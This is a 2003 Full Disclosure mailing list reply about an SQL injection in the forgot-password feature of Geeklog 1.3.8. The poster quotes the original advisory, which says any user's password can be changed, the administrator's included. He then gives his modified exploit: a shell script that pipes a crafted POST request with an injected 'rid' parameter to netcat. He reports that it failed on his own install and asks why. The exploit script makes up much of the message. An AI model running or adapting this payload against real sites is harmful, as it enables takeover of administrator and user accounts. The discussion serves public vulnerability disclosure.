Full Disclosure mailing list archives
Re: Geeklog exploit
From: Thomas Rogg <thomas () outcast-media com>
Date: Sun, 19 Oct 2003 20:15:15 +0200
On 19.10.2003 at 18:21, Jouko Pynnonen (jouko () iki fi) wrote:
> ... The exploit uses the "forgot password" feature introduced in Geeklog 1.3.8. By constructing a certain kind of HTTP request, an attacker can change any user's Geeklog password, including the administrator password. This is because of an SQL injection problem. In users.php we have this kind of code (line about 750): ...
I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML says: "Your request for a new password has expired. Please try again below." Am I missing something? All I changed was to use HTTP/1.1 and to use parameters for host and path:

-----
#!/bin/sh
echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,
Thomas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html